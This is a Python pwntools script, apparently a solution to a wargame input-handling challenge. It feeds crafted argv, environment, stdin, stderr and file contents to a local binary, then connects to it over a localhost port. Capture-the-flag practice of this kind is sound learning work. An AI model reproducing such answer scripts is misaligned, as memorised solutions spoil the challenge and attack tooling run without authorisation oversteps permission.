exploit code
# -*- coding: utf-8 -*-
from pwn import *
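# TCP port (kept as a string) that stage1 places verbatim into argv[67] and
# that stage5 later connects to on localhost after converting it with int().
# A module-level `global` statement is a no-op, so it is dropped here.
port = "8080"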
def stage1():
    """Build the argv list handed to the target program.

    argv[0] is the program path and argv[1..99] are the decimal strings
    "0".."98", with three slots overwritten afterwards: argv[65] is a lone
    NUL character, argv[66] is space/LF/CR, and argv[67] is the module-level
    ``port`` string that stage5 connects to.  Returns the list (100 entries).
    """
    argv = ['/home/input2/input'] + [str(n) for n in range(99)]
    overrides = {
        65: "\x00",
        66: "\x20\x0a\x0d",
        67: port,  # the same value stage5 dials
    }
    for index, value in overrides.items():
        argv[index] = value
    return argv
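def stage2():
    """Create the file the target will see as its stderr and return it opened for reading.

    Writes the four characters "\\x00\\x0a\\x02\\xff" to a file named
    ``stderr`` in the current directory, then reopens it read-only.  The
    returned handle is passed to ``process(..., stderr=...)`` by main() and is
    intentionally left open for the caller to own.

    NOTE(review): the script is written for Python 2 (print statements), where
    ``str`` is bytes; under Python 3 text mode "\\xff" would be encoded as two
    bytes, so a port should open the file in binary mode.
    """
    with open("stderr", "w") as out:  # closed even if write() raises
        out.write("\x00\x0a\x02\xff")
    return open("stderr", "r")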
def stage3():
    """Return the environment mapping given to the target process.

    It holds a single variable whose name and value are the four-character
    strings "\\xde\\xad\\xbe\\xef" and "\\xca\\xfe\\xba\\xbe".
    """
    var_name = '\xde\xad\xbe\xef'
    var_value = '\xca\xfe\xba\xbe'
    return {var_name: var_value}
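def stage4():
    """Create a file named "\\x0a" (a single line feed) containing four NUL characters.

    The file is written into the current directory; main() calls this after
    sending the stdin payload, presumably so the target can read it next
    (the target's behaviour is not visible here).  Returns None.
    """
    with open("\x0a", "w") as out:  # closed even if write() raises
        out.write("\x00\x00\x00\x00")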
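def stage5():
    """Connect to localhost on ``port`` and send one line of "\\xde\\xad\\xbe\\xef".

    ``port`` is the module-level string (the same value stage1 puts in
    argv[67]); it is converted with int() here.  The socket is closed in a
    ``finally`` block so a failing sendline() does not leak the connection.
    """
    conn = remote("localhost", int(port))
    try:
        conn.sendline("\xde\xad\xbe\xef")
    finally:
        conn.close()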
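def main():
    """Run the five stages against the target process in order.

    Stages 1-3 are supplied at spawn time (argv, the stderr file, the
    environment).  The stdin half of stage 2 is sent after the first banner,
    stage4 then writes its file, and stage5 connects to the port the target
    was given in argv[67].  Finally the session is handed to the user.

    The script targets Python 2 (str is bytes); ``print(...)`` with a single
    argument behaves the same in both versions.  The process is closed in a
    ``finally`` block so an exception in any stage does not leave it running.
    """
    target = process(stage1(), env=stage3(), stderr=stage2())
    try:
        print(target.recv(1024))
        target.sendline("\x00\x0a\x00\xff")  # stdin half of stage 2
        print(target.recvline(''))
        stage4()
        print(target.recv(1024))
        stage5()
        target.interactive()
    finally:
        target.close()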
# Script entry point: run the stages only when executed directly, not on import.
if __name__ == "__main__":
    main()